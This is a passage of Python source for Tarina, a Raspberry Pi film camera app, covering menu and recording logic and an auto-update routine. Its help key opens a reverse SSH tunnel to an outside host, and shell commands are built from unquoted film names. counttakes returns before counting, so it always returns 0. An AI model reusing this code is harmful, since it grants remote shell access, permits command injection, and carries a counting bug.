if filmname != newfilmname:
os.system('mv ' + filmfolder + filmname + ' ' + filmfolder + newfilmname)
filmname = newfilmname
vumetermessage('Film title changed to ' + filmname + '!')
else:
vumetermessage('')
#(YANK) COPY SHOT
elif pressed == 'copy' and menu[selected] == 'SHOT:' and recordable == False:
cuttedshot = ''
yankedshot = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3)
vumetermessage('Shot ' + str(shot) + ' copied! (I)nsert button to place it...')
time.sleep(1)
#(YANK) COPY SCENE
elif pressed == 'copy' and menu[selected] == 'SCENE:' and recordable == False:
cuttedscene = ''
yankedscene = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3)
vumetermessage('Scene ' + str(scene) + ' copied! (I)nsert button to place it...')
time.sleep(1)
#(CUT) MOVE SHOT
elif pressed == 'move' and menu[selected] == 'SHOT:' and recordable == False:
yankedshot = ''
cuttedshot = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3)
vumetermessage('Moving shot ' + str(shot) + ' (I)nsert button to place it...')
time.sleep(1)
#(CUT) MOVE SCENE
elif pressed == 'move' and menu[selected] == 'SCENE:' and recordable == False:
yankedscene = ''
cuttedscene = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3)
vumetermessage('Moving scene ' + str(scene) + ' (I)nsert button to place it...')
time.sleep(1)
#PASTE SHOT and PASTE SCENE
elif pressed == 'insert' and menu[selected] == 'SHOT:' and yankedshot:
vumetermessage('Pasting shot, please wait...')
pasteshot = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot-1).zfill(3) + '_yanked'
try:
os.makedirs(filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3))
except:
pass
os.system('cp -r ' + yankedshot + ' ' + pasteshot)
add_organize(filmfolder, filmname)
updatethumb = True
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
yankedshot = ''
vumetermessage('Shot pasted!')
time.sleep(1)
elif pressed == 'insert' and menu[selected] == 'SCENE:' and yankedscene:
vumetermessage('Pasting scene, please wait...')
pastescene = filmfolder + filmname + '/' + 'scene' + str(scene-1).zfill(3) + '_yanked'
os.system('cp -r ' + yankedscene + ' ' + pastescene)
add_organize(filmfolder, filmname)
shot = countshots(filmname, filmfolder, scene)
updatethumb = True
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
yankedscene = ''
vumetermessage('Scene pasted!')
time.sleep(1)
#MOVE SHOT and MOVE SCENE
elif pressed == 'insert' and menu[selected] == 'SHOT:' and cuttedshot:
vumetermessage('Moving shot, please wait...')
pasteshot = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot-1).zfill(3) + '_yanked'
try:
os.makedirs(filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3))
except:
pass
os.system('cp -r ' + cuttedshot + ' ' + pasteshot)
os.system('rm -r ' + cuttedshot + '/*')
#Remove hidden placeholder
os.system('rm ' + cuttedshot + '/.placeholder')
add_organize(filmfolder, filmname)
organize(filmfolder, filmname)
cuttedshot = ''
updatethumb = True
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
vumetermessage('Shot moved!')
time.sleep(1)
elif pressed == 'insert' and menu[selected] == 'SCENE:' and cuttedscene:
vumetermessage('Moving scene, please wait...')
pastescene = filmfolder + filmname + '/' + 'scene' + str(scene-1).zfill(3) + '_yanked'
os.system('cp -r ' + cuttedscene + ' ' + pastescene)
os.system('rm -r ' + cuttedscene + '/*')
os.system('rm ' + cuttedscene + '/.placeholder')
add_organize(filmfolder, filmname)
organize(filmfolder, filmname)
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
shot = countshots(filmname, filmfolder, scene)
cuttedscene = ''
updatethumb = True
vumetermessage('Scene moved!')
time.sleep(1)
#INSERT SHOT
elif pressed == 'insert' and menu[selected] == 'SHOT:' and recordable == False:
insertshot = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot-1).zfill(3) + '_insert'
os.makedirs(insertshot)
add_organize(filmfolder, filmname)
take = 1
updatethumb = True
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
vumetermessage('Shot ' + str(shot) + ' inserted')
time.sleep(1)
#INSERT SCENE
elif pressed == 'insert' and menu[selected] == 'SCENE:' and recordable == False:
insertscene = filmfolder + filmname + '/' + 'scene' + str(scene-1).zfill(3) + '_insert'
logger.info("inserting scene")
os.makedirs(insertscene)
add_organize(filmfolder, filmname)
take = 1
shot = 1
updatethumb = True
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
vumetermessage('Scene ' + str(scene) + ' inserted')
time.sleep(1)
#HELPME
elif event == 'H':
if webz_on() == True:
writemessage('Rob resolving the error now...')
try:
stopinterface(camera)
run_command('reset')
run_command('ssh -R 18888:localhost:22 [email protected] -p 13337')
startinterface()
camera = startcamera(lens)
loadfilmsettings = True
except:
writemessage('sry! no rob help installed')
#DEVELOP
elif event == 'D':
try:
stopinterface(camera)
code.interact(local=locals())
startinterface()
camera = startcamera(lens)
loadfilmsettings = True
except:
writemessage('hmm.. couldnt enter developer mode')
#REMOVE
#take
elif pressed == 'remove' and menu[selected] == 'TAKE:':
remove(filmfolder, filmname, scene, shot, take, 'take')
organize(filmfolder, filmname)
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
updatethumb = True
time.sleep(0.5)
#shot
elif pressed == 'remove' and menu[selected] == 'SHOT:':
remove(filmfolder, filmname, scene, shot, take, 'shot')
organize(filmfolder, filmname)
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
updatethumb = True
time.sleep(0.5)
#scene
elif pressed == 'remove' and menu[selected] == 'SCENE:':
remove(filmfolder, filmname, scene, shot, take, 'scene')
organize(filmfolder, filmname)
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
shot = countshots(filmname, filmfolder, scene)
updatethumb = True
time.sleep(0.5)
#film
elif pressed == 'remove' and menu[selected] == 'FILM:':
remove(filmfolder, filmname, scene, shot, take, 'film')
try:
filmname = getfilms(filmfolder)[0][0]
except:
filmname = ''
if filmname == '':
filmname = nameyourfilm(filmfolder,filmname,abc, True)
else:
scene, shot, take = countlast(filmname, filmfolder)
loadfilmsettings = True
updatethumb = True
time.sleep(0.5)
#RECORD AND PAUSE
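# Beep countdown state machine: 'beeps' holds the number of countdown seconds
# and is copied into beepcountdown when recording is armed. A beep fires once
# per second; in the final second rapid beeps play, then a long beep sounds and
# pressed is forced to 'record' so the record branch below starts the take.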
if beepcountdown > 1:
if time.time() - lastbeep > 1:
beep()
beepcountdown -= 1
lastbeep = time.time()
logger.info('beepcountdown: ' + str(beepcountdown))
vumetermessage('Filming in ' + str(beepcountdown) + ' seconds, press record again to cancel ')
elif beepcountdown > 0:
if time.time() - float(lastbeep) > 0.1:
beep()
vumetermessage('Get ready!!')
if time.time() - lastbeep > 1:
longbeep()
beepcountdown = 0
pressed = 'record'
print('exhausted from all beepings')
if pressed == 'record' or pressed == 'retake' or (reclenght != 0 and t > reclenght):
overlay = removeimage(camera, overlay)
if recording == False and recordable == True:
if beeps > 0 and beeping == False:
beeping = True
beepcountdown = beeps
elif beepcountdown == 0:
beeping = False
if os.path.isdir(foldername) == False:
os.makedirs(foldername)
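# Audio and video are captured in parallel: arecord writes a WAV to /dev/shm
# while picamera records H.264; the WAV is copied next to the take once
# recording stops.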
os.system(tarinafolder + '/alsa-utils-1.1.3/aplay/arecord -D plughw:' + str(plughw) + ' -f S16_LE -c ' + str(channels) + ' -r44100 -vv /dev/shm/' + filename + '.wav &')
camera.start_recording(foldername + filename + '.h264', format='h264', quality=26, bitrate=5000000)
starttime = time.time()
recording = True
elif beepcountdown > 0 and beeping == True:
beeping = False
beepcountdown = 0
vumetermessage('Filming was canceled!!')
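# Stop path: stop requests are ignored for the first 0.2 s after starting,
# then the take is finalized (stop the camera, kill arecord, grab a thumbnail
# through the video port, copy the WAV from /dev/shm into the take folder).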
elif recording == True and float(time.time() - starttime) > 0.2:
disk = os.statvfs(tarinafolder + '/')
diskleft = str(int(disk.f_bavail * disk.f_frsize / 1024 / 1024 / 1024)) + 'Gb'
recording = False
camera.stop_recording()
#time.sleep(0.005) #get audio at least 0.1 longer
os.system('pkill arecord')
if beeps > 0:
buzz(150)
#camera.capture(foldername + filename + '.jpeg', resize=(800,341))
try:
camera.capture(foldername + filename + '.jpeg', resize=(800,340), use_video_port=True)
except:
logger.warning('something wrong with camera jpeg capture')
t = 0
rectime = ''
vumetermessage('Tarina ' + tarinaversion[:-1] + ' ' + tarinavername[:-1])
updatethumb = True
#compileshot(foldername + filename)
os.system('cp /dev/shm/' + filename + '.wav ' + foldername + filename + '.wav')
#delayerr = audiotrim(foldername,filename)
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
if beeps > 0:
buzz(300)
#if not in last shot or take then go to it
if pressed == 'record' and recordable == False:
scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
#take = takes
#takes = counttakes(filmname, filmfolder, scene, shot)
if takes > 0:
shot = countshots(filmname, filmfolder, scene) + 1
take = 1
takes = 0
if pressed == 'retake' and recordable == False:
#scenes, shots, takes = browse(filmname,filmfolder,scene,shot,take)
take = counttakes(filmname, filmfolder, scene, shot)
#take = takes
#takes = counttakes(filmname, filmfolder, scene, shot)
take = takes + 1
#ENTER (auto shutter, iso, awb on/off)
elif pressed == 'middle' and menu[selected] == 'SHUTTER:':
if camera.shutter_speed == 0:
camera.shutter_speed = camera.exposure_speed
else:
camera.shutter_speed = 0
elif pressed == 'middle' and menu[selected] == 'ISO:':
if camera.iso == 0:
camera.iso = 100
else:
camera.iso = 0
elif pressed == 'middle' and menu[selected] == 'RED:':
if camera.awb_mode == 'auto':
camera.awb_gains = (float(camera.awb_gains[0]), float(camera.awb_gains[1]))
camera.awb_mode = 'off'
else:
camera.awb_mode = 'auto'
elif pressed == 'middle' and menu[selected] == 'BLUE:':
if camera.awb_mode == 'auto':
camera.awb_gains = (float(camera.awb_gains[0]), float(camera.awb_gains[1]))
camera.awb_mode = 'off'
else:
camera.awb_mode = 'auto'
elif pressed == 'middle' and menu[selected] == 'BEEP:':
beeps = 0
elif pressed == 'middle' and menu[selected] == 'LIVE:':
if stream == '':
stream = startstream(camera, stream, plughw, channels)
if stream == '':
vumetermessage('something wrong with streaming')
else:
live = 'yes'
else:
stream = stopstream(camera, stream)
live = 'no'
elif pressed == 'middle' and menu[selected] == 'BRIGHT:':
camera.brightness = 50
elif pressed == 'middle' and menu[selected] == 'CONT:':
camera.contrast = 0
elif pressed == 'middle' and menu[selected] == 'SAT:':
camera.saturation = 0
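# Menu navigation: up/down adjust the value of the selected menu entry,
# left/right move the selection; index 4 (the recording-time display) is
# skipped when cycling through the menu.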
#UP
elif pressed == 'up':
if menu[selected] == 'BRIGHT:':
camera.brightness = min(camera.brightness + 1, 99)
elif menu[selected] == 'CONT:':
camera.contrast = min(camera.contrast + 1, 99)
elif menu[selected] == 'SAT:':
camera.saturation = min(camera.saturation + 1, 99)
elif menu[selected] == 'SHUTTER:':
if camera.shutter_speed == 0:
camera.shutter_speed = camera.exposure_speed
if camera.shutter_speed < 5000:
camera.shutter_speed = min(camera.shutter_speed + 50, 50000)
else:
camera.shutter_speed = min(camera.shutter_speed + 200, 50000)
elif menu[selected] == 'ISO:':
camera.iso = min(camera.iso + 100, 1600)
elif menu[selected] == 'BEEP:':
beeps = beeps + 1
elif menu[selected] == 'FLIP:':
if flip == 'yes':
camera.hflip = False
camera.vflip = False
flip = 'no'
time.sleep(0.2)
else:
camera.hflip = True
camera.vflip = True
flip = 'yes'
time.sleep(0.2)
elif menu[selected] == 'LENGTH:':
reclenght = reclenght + 1
time.sleep(0.1)
elif menu[selected] == 'MIC:':
if miclevel < 100:
miclevel = miclevel + 2
run_command('amixer -c 0 sset Mic ' + str(miclevel) + '% unmute')
elif menu[selected] == 'PHONES:':
if headphoneslevel < 100:
headphoneslevel = headphoneslevel + 2
run_command('amixer -c 0 sset Speaker ' + str(headphoneslevel) + '%')
elif menu[selected] == 'SCENE:' and recording == False:
if scene <= scenes:
shot = 1
scene += 1
take = counttakes(filmname, filmfolder, scene, shot)
#scene, shots, takes = browse2(filmname, filmfolder, scene, shot, take, 0, 1)
#shot = 1
elif menu[selected] == 'SHOT:' and recording == False:
if shot <= shots:
shot += 1
take = counttakes(filmname, filmfolder, scene, shot)
#scene, shot, take = browse2(filmname, filmfolder, scene, shot, take, 1, 1)
#takes = take
elif menu[selected] == 'TAKE:' and recording == False:
if take <= takes:
take += 1
#scene, shot, take = browse2(filmname, filmfolder, scene, shot, take, 2, 1)
elif menu[selected] == 'RED:':
camera.awb_mode = 'off'
if float(camera.awb_gains[0]) < 7.98:
camera.awb_gains = (round(camera.awb_gains[0],2) + 0.02, round(camera.awb_gains[1],2))
elif menu[selected] == 'BLUE:':
camera.awb_mode = 'off'
if float(camera.awb_gains[1]) < 7.98:
camera.awb_gains = (round(camera.awb_gains[0],2), round(camera.awb_gains[1],2) + 0.02)
elif menu[selected] == 'SRV:':
if serverstate == 'on':
serverstate = tarinaserver(False)
elif serverstate == 'off':
serverstate = tarinaserver(True)
elif menu[selected] == 'WIFI:':
if wifistate == 'on':
run_command('sudo iwconfig wlan0 txpower off')
wifistate = 'off'
elif wifistate == 'off':
run_command('sudo iwconfig wlan0 txpower auto')
wifistate = 'on'
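# Lens shading: cycles through the calibration files in lenses/ and applies
# them via camera.lens_shading_table, which appears to require a picamera
# build that exposes that attribute.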
elif menu[selected] == 'LENS:':
s = 0
for a in lenses:
if a == lens:
selectlens = s
s += 1
if selectlens < len(lenses) - 1:
selectlens += 1
lens = os.listdir('lenses/')[selectlens]
#npzfile = np.load('lenses/' + lens)
#lensshade = npzfile['lens_shading_table']
table = read_table('lenses/' + lens)
camera.lens_shading_table = table
elif menu[selected] == 'COMP:':
if comp < 1:
comp += 1
elif menu[selected] == 'HW:':
if plughw < len(getaudiocards())-1:
plughw += 1
vumetermessage(getaudiocards()[plughw])
elif menu[selected] == 'CH:':
if channels == 1:
channels = 2
#LEFT
elif pressed == 'left':
if selected > 0:
selected = selected - 1
else:
selected = len(menu) - 1
if selected == 4:
selected = 3
#DOWN
elif pressed == 'down':
if menu[selected] == 'BRIGHT:':
camera.brightness = max(camera.brightness - 1, 0)
elif menu[selected] == 'CONT:':
camera.contrast = max(camera.contrast - 1, -100)
elif menu[selected] == 'SAT:':
camera.saturation = max(camera.saturation - 1, -100)
elif menu[selected] == 'SHUTTER:':
if camera.shutter_speed == 0:
camera.shutter_speed = camera.exposure_speed
if camera.shutter_speed < 5000:
camera.shutter_speed = max(camera.shutter_speed - 50, 20)
else:
camera.shutter_speed = max(camera.shutter_speed - 200, 200)
elif menu[selected] == 'ISO:':
camera.iso = max(camera.iso - 100, 100)
elif menu[selected] == 'BEEP:':
if beeps > 0:
beeps = beeps - 1
elif menu[selected] == 'FLIP:':
if flip == 'yes':
camera.hflip = False
camera.vflip = False
flip = 'no'
time.sleep(0.2)
else:
camera.hflip = True
camera.vflip = True
flip = 'yes'
time.sleep(0.2)
elif menu[selected] == 'LENGTH:':
if reclenght > 0:
reclenght = reclenght - 1
time.sleep(0.1)
elif menu[selected] == 'MIC:':
if miclevel > 0:
miclevel = miclevel - 2
run_command('amixer -c 0 sset Mic ' + str(miclevel) + '% unmute')
elif menu[selected] == 'PHONES:':
if headphoneslevel > 0:
headphoneslevel = headphoneslevel - 2
run_command('amixer -c 0 sset Speaker ' + str(headphoneslevel) + '%')
elif menu[selected] == 'SCENE:' and recording == False:
if scene > 1:
scene -= 1
shot = 1
take = counttakes(filmname, filmfolder, scene, shot)
#scene, shots, take = browse2(filmname, filmfolder, scene, shot, take, 0, -1)
#takes = take
#shot = 1
elif menu[selected] == 'SHOT:' and recording == False:
if shot > 1:
shot -= 1
take = counttakes(filmname, filmfolder, scene, shot)
#scene, shot, take = browse2(filmname, filmfolder, scene, shot, take, 1, -1)
#takes = take
elif menu[selected] == 'TAKE:' and recording == False:
if take > 1:
take -= 1
#scene, shot, take = browse2(filmname, filmfolder, scene, shot, take, 2, -1)
elif menu[selected] == 'RED:':
camera.awb_mode = 'off'
if float(camera.awb_gains[0]) > 0.02:
camera.awb_gains = (round(camera.awb_gains[0],2) - 0.02, round(camera.awb_gains[1],2))
elif menu[selected] == 'BLUE:':
camera.awb_mode = 'off'
if float(camera.awb_gains[1]) > 0.02:
camera.awb_gains = (round(camera.awb_gains[0],2), round(camera.awb_gains[1],2) - 0.02)
elif menu[selected] == 'SRV:':
if serverstate == 'on':
serverstate = tarinaserver(False)
elif serverstate == 'off':
serverstate = tarinaserver(True)
elif menu[selected] == 'WIFI:':
if wifistate == 'on':
run_command('sudo iwconfig wlan0 txpower off')
wifistate = 'off'
elif wifistate == 'off':
run_command('sudo iwconfig wlan0 txpower auto')
wifistate = 'on'
elif menu[selected] == 'LENS:':
s = 0
for a in lenses:
if a == lens:
selectlens = s
s += 1
if selectlens > 0:
selectlens -= 1
lens = os.listdir('lenses/')[selectlens]
#npzfile = np.load('lenses/' + lens)
#lensshade = npzfile['lens_shading_table']
table = read_table('lenses/' + lens)
camera.lens_shading_table = table
elif menu[selected] == 'DUB:':
if round(dub[0],1) == 1.0 and round(dub[1],1) > 0.0:
dub[1] -= 0.1
if round(dub[1],1) == 1.0 and round(dub[0],1) < 1.0:
dub[0] += 0.1
elif menu[selected] == 'COMP:':
if comp > 0:
comp -= 1
elif menu[selected] == 'HW:':
if plughw > 0:
plughw -= 1
vumetermessage(getaudiocards()[plughw])
elif menu[selected] == 'CH:':
if channels == 2:
channels = 1
#RIGHT
elif pressed == 'right':
if selected < len(menu) - 1:
selected = selected + 1
else:
selected = 0
if selected == 4: #jump over recording time
selected = 5
#Start Recording Time
if recording == True:
t = time.time() - starttime
rectime = time.strftime("%H:%M:%S", time.gmtime(t))
#Load settings
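# The indices used below must stay in sync with the settings list built in
# the save block further down (and with savesettings()/loadsettings()).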
if loadfilmsettings == True:
try:
filmsettings = loadsettings(filmfolder, filmname)
camera.brightness = filmsettings[2]
camera.contrast = filmsettings[3]
camera.saturation = filmsettings[4]
camera.shutter_speed = filmsettings[5]
camera.iso = filmsettings[6]
camera.awb_mode = filmsettings[7]
camera.awb_gains = filmsettings[8]
awb_lock = filmsettings[9]
miclevel = filmsettings[10]
headphoneslevel = filmsettings[11]
beeps = filmsettings[12]
flip = filmsettings[13]
comp = filmsettings[14]
between = filmsettings[15]
duration = filmsettings[16]
logger.info('film settings loaded & applied')
time.sleep(0.2)
except:
logger.warning('could not load film settings')
if flip == "yes":
camera.vflip = True
camera.hflip = True
run_command('amixer -c 0 sset Mic ' + str(miclevel) + '% unmute')
run_command('amixer -c 0 sset Speaker ' + str(headphoneslevel) + '%')
organize(filmfolder, filmname)
scene = 1
shot = 1
scenes = countscenes(filmfolder, filmname)
shots = countshots(filmname, filmfolder, scene)
takes = counttakes(filmname, filmfolder, scene, shot)
loadfilmsettings = False
rendermenu = True
updatethumb = True
if scene == 0:
scene = 1
if take == 0:
take = 1
if shot == 0:
shot = 1
# If menu at SCENE show first shot thumbnail off that scene
if menu[selected] == 'FILM:' and lastmenu != menu[selected] and recordable == False:
updatethumb = True
if menu[selected] == 'SCENE:' and lastmenu != menu[selected] and recordable == False:
updatethumb = True
if menu[selected] == 'SHOT:' and lastmenu != menu[selected] and recordable == False:
updatethumb = True
if menu[selected] == 'TAKE:' and lastmenu != menu[selected] and recordable == False:
updatethumb = True
#Check if scene, shot, or take changed and update thumbnail
if oldscene != scene or oldshot != shot or oldtake != take or updatethumb == True:
if recording == False:
logger.info('film:' + filmname + ' scene:' + str(scene) + '/' + str(scenes) + ' shot:' + str(shot) + '/' + str(shots) + ' take:' + str(take) + '/' + str(takes))
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(take).zfill(3)
recordable = not os.path.isfile(foldername + filename + '.mp4') and not os.path.isfile(foldername + filename + '.h264')
overlay = removeimage(camera, overlay)
if menu[selected] == 'SCENE:' and recordable == False: # display first shot of scene if browsing scenes
p = counttakes(filmname, filmfolder, scene, 1)
imagename = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/shot' + str(1).zfill(3) + '/take' + str(p).zfill(3) + '.jpeg'
elif menu[selected] == 'FILM:' and recordable == True:
scene, shot, take = countlast(filmname,filmfolder)
shot += 1
elif menu[selected] == 'FILM:' and recordable == False: # display first shot of film
p = counttakes(filmname, filmfolder, 1, 1)
imagename = filmfolder + filmname + '/scene' + str(1).zfill(3) + '/shot' + str(1).zfill(3) + '/take' + str(p).zfill(3) + '.jpeg'
imagename = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/shot' + str(shot).zfill(3) + '/take' + str(take).zfill(3) + '.jpeg'
overlay = displayimage(camera, imagename, overlay)
oldscene = scene
oldshot = shot
oldtake = take
updatethumb = False
scenes = countscenes(filmfolder, filmname)
shots = countshots(filmname, filmfolder, scene)
takes = counttakes(filmname, filmfolder, scene, shot)
#If auto dont show value show auto (impovement here to show different colors in gui, yes!!?)
if camera.iso == 0:
cameraiso = 'auto'
else:
cameraiso = str(camera.iso)
if camera.shutter_speed == 0:
camerashutter = 'auto'
else:
camerashutter = str(camera.exposure_speed).zfill(5)
if camera.awb_mode == 'auto':
camerared = 'auto'
camerablue = 'auto'
else:
camerared = str(float(camera.awb_gains[0]))[:4]
camerablue = str(float(camera.awb_gains[1]))[:4]
#Check if menu is changed and save settings / sec
if buttonpressed == True or recording == True or rendermenu == True:
lastmenu = menu[selected]
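# 'settings' below must line up index-for-index with the 'menu' tuple defined
# at the top; empty strings act as spacers for entries with no value to show.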
settings = filmname, str(scene) + '/' + str(scenes), str(shot) + '/' + str(shots), str(take) + '/' + str(takes), rectime, camerashutter, cameraiso, camerared, camerablue, str(camera.brightness), str(camera.contrast), str(camera.saturation), str(flip), str(beeps), str(reclenght), str(plughw), str(channels), str(miclevel), str(headphoneslevel), str(comp), '', lens, diskleft, '', serverstate, wifistate, '', '', '', '', '', '', live
writemenu(menu,settings,selected,'')
#Rerender menu if picamera settings change
if settings != oldsettings:
rendermenu = True
#save settings if menu has been updated and x seconds passed
if recording == False:
if time.time() - pausetime > savesettingsevery:
settings_to_save = [filmfolder, filmname, camera.brightness, camera.contrast, camera.saturation, camera.shutter_speed, camera.iso, camera.awb_mode, camera.awb_gains, awb_lock, miclevel, headphoneslevel, beeps, flip, comp, between, duration]
print('saving settings')
savesettings(settings_to_save, filmname, filmfolder)
pausetime = time.time()
#writemessage(pressed)
oldsettings = settings
time.sleep(keydelay)
#--------------Logger-----------------------
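# Minimal stand-in for the logging module: methods are called on the class
# itself (logger.info(...)), so no instance is ever created.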
class logger():
def info(info):
print(term.yellow(info))
def warning(warning):
print('Warning: ' + warning)
#--------------Save settings-----------------
def savesettings(settings, filmname, filmfolder):
print(settings)
try:
with open(filmfolder + filmname + "/settings.p", "wb") as f:
pickle.dump(settings, f)
logger.info("settings saved")
except:
logger.warning("could not save settings")
#logger.warning(e)
return
#--------------Load film settings--------------
def loadsettings(filmfolder, filmname):
try:
settings = pickle.load(open(filmfolder + filmname + "/settings.p", "rb"))
logger.info("settings loaded")
return settings
except:
logger.info("couldnt load settings")
return ''
#--------------Write the menu layer to dispmanx--------------
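# The UI is not drawn here: the menu text is written to /dev/shm/interface
# (and /dev/shm/vumeter below), presumably read by the separate interface
# process started via startinterface().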
def writemenu(menu,settings,selected,header):
menudone = ''
menudone += str(selected) + '\n'
menudone += header + '\n'
for i, s in zip(menu, settings):
menudone += i + s + '\n'
spaces = max(0, 500 - len(menudone)) #pad to a fixed width so the previous menu is fully cleared
menudone += spaces * ' '
#menudone += 'EOF'
f = open('/dev/shm/interface', 'w')
f.write(menudone)
f.close()
#------------Write to screen----------------
def writemessage(message):
menudone = ""
menudone += '0' + '\n'
menudone += message + '\n'
#menudone += 'EOF'
#clear = 500
#clear = clear - len(message)
f = open('/dev/shm/interface', 'w')
f.write(menudone)
f.close()
#------------Write to vumeter (last line)-----
def vumetermessage(message):
clear = 72
clear = clear - len(message)
f = open('/dev/shm/vumeter', 'w')
f.write(message + clear * ' ')
f.close()
#------------Count file size-----
def countvideosize(filename):
size = 0
if type(filename) is list:
size = 0
for i in filename[:]:
size = size + os.stat(i + '.mp4').st_size
if type(filename) is str:
size = os.stat(filename + '.mp4').st_size
return size/1024
def countsize(filename):
size = 0
if type(filename) is str:
size = os.stat(filename).st_size
return size/1024
#------------Count scenes, takes and shots-----
def countlast(filmname, filmfolder):
scenes = 0
shots = 0
takes = 0
try:
allfiles = os.listdir(filmfolder + filmname)
except:
allfiles = []
scenes = 0
for a in allfiles:
if 'scene' in a:
scenes = scenes + 1
try:
allfiles = os.listdir(filmfolder + filmname + '/scene' + str(scenes).zfill(3))
except:
allfiles = []
shots = 0
for a in allfiles:
if 'shot' in a:
shots = shots + 1
try:
allfiles = os.listdir(filmfolder + filmname + '/scene' + str(scenes).zfill(3) + '/shot' + str(shots).zfill(3))
except:
allfiles = []
takes = 0
for a in allfiles:
if '.mp4' in a or '.h264' in a:
takes = takes + 1
return scenes, shots, takes
#------------Count scenes--------
def countscenes(filmfolder, filmname):
scenes = 0
try:
allfiles = os.listdir(filmfolder + filmname)
except:
allfiles = []
scenes = 0
for a in allfiles:
if 'scene' in a:
scenes = scenes + 1
return scenes
#------------Count shots--------
def countshots(filmname, filmfolder, scene):
shots = 0
try:
allfiles = os.listdir(filmfolder + filmname + '/scene' + str(scene).zfill(3))
except:
allfiles = []
shots = 0
for a in allfiles:
if 'shot' in a:
shots = shots + 1
return shots
#------------Count takes--------
def counttakes(filmname, filmfolder, scene, shot):
takes = 0
try:
allfiles = os.listdir(filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/shot' + str(shot).zfill(3))
except:
allfiles = []
return takes
for a in allfiles:
if '.mp4' in a or '.h264' in a:
takes = takes + 1
return takes
#------------Run Command-------------
def run_command(command_line):
#command_line_args = shlex.split(command_line)
logger.info('Running: "' + command_line + '"')
try:
process = subprocess.Popen(command_line, shell=True).wait()
# wait() returns the exit code of the shell command
except (OSError, CalledProcessError) as exception:
logger.warning('Exception occured: ' + str(exception))
logger.warning('Process failed')
return False
else:
# no exception was raised
logger.info('Process finished')
return True
#-------------Display jpeg-------------------
def displayimage(camera, filename, overlay):
# Load the arbitrarily sized image
try:
img = Image.open(filename)
except:
#writemessage('Seems like an empty shot. Hit record!')
overlay = removeimage(camera, overlay)
return overlay
camera.stop_preview()
# Create an image padded to the required size with
# mode 'RGB'
pad = Image.new('RGB', (
((img.size[0] + 31) // 32) * 32,
((img.size[1] + 15) // 16) * 16,
))
# Paste the original image into the padded one
pad.paste(img, (0, 0))
# Add the overlay with the padded image as the source,
# but the original image's dimensions
overlay = camera.add_overlay(pad.tobytes(), size=img.size)
# By default, the overlay is in layer 0, beneath the
# preview (which defaults to layer 2). Here we make
# the new overlay semi-transparent, then move it above
# the preview
overlay.alpha = 255
overlay.layer = 3
return overlay
def removeimage(camera, overlay):
if overlay:
try:
camera.remove_overlay(overlay)
overlay = None
camera.start_preview()
except:
pass
return overlay
#-------------Browse------------------
def browse(filmname, filmfolder, scene, shot, take):
scenes = countscenes(filmfolder, filmname)
shots = countshots(filmname, filmfolder, scene)
takes = counttakes(filmname, filmfolder, scene, shot)
return scenes, shots, takes
#-------------Browse2.0------------------
def browse2(filmname, filmfolder, scene, shot, take, n, b):
scenes = countscenes(filmfolder, filmname)
shots = countshots(filmname, filmfolder, scene)
takes = counttakes(filmname, filmfolder, scene, shot)
#writemessage(str(scene) + ' < ' + str(scenes))
#time.sleep(4)
selected = n
if selected == 0 and b == 1:
if scene < scenes + 1: #remove this if u want to select any scene
scene = scene + 1
shot = countshots(filmname, filmfolder, scene)
take = counttakes(filmname, filmfolder, scene, shot)
#if take == 0:
#shot = shot - 1
#take = counttakes(filmname, filmfolder, scene, shot - 1)
elif selected == 1 and b == 1:
if shot < shots + 1: #remove this if u want to select any shot
shot = shot + 1
take = counttakes(filmname, filmfolder, scene, shot)
elif selected == 2 and b == 1:
if take < takes + 1:
take = take + 1
elif selected == 0 and b == -1:
if scene > 1:
scene = scene - 1
shot = countshots(filmname, filmfolder, scene)
take = counttakes(filmname, filmfolder, scene, shot)
#if take == 0:
# shot = shot - 1
# take = counttakes(filmname, filmfolder, scene, shot - 1)
elif selected == 1 and b == -1:
if shot > 1:
shot = shot - 1
take = counttakes(filmname, filmfolder, scene, shot)
elif selected == 2 and b == -1:
if take > 1:
take = take - 1
return scene, shot, take
#-------------Update------------------
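# Update flow: fetch the VERSION file from the GitHub master branch, compare
# the version numbers as floats, and if a newer one exists do a git pull,
# rerun install.sh and reboot.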
def update(tarinaversion, tarinavername):
logger.info('Current version ' + tarinaversion[:-1] + ' ' + tarinavername[:-1])
time.sleep(2)
logger.info('Checking for updates...')
try:
run_command('wget -N https://raw.githubusercontent.com/rbckman/tarina/master/VERSION -P /tmp/')
except:
logger.info('Sorry buddy, no internet connection')
time.sleep(2)
return tarinaversion, tarinavername
try:
f = open('/tmp/VERSION')
versionnumber = f.readline()
versionname = f.readline()
except:
logger.info('hmm.. something wrong with the update')
return tarinaversion, tarinavername
if round(float(tarinaversion),3) < round(float(versionnumber),3):
logger.info('New version found ' + versionnumber[:-1] + ' ' + versionname[:-1])
time.sleep(4)
logger.info('Updating...')
run_command('git -C ' + tarinafolder + ' pull')
run_command('sudo ' + tarinafolder + '/install.sh')
logger.info('Update done, will now reboot Tarina')
waitforanykey()
logger.info('Hold on rebooting Tarina...')
run_command('sudo reboot')
logger.info('Version is up-to-date!')
return tarinaversion, tarinavername
#-------------Get films---------------
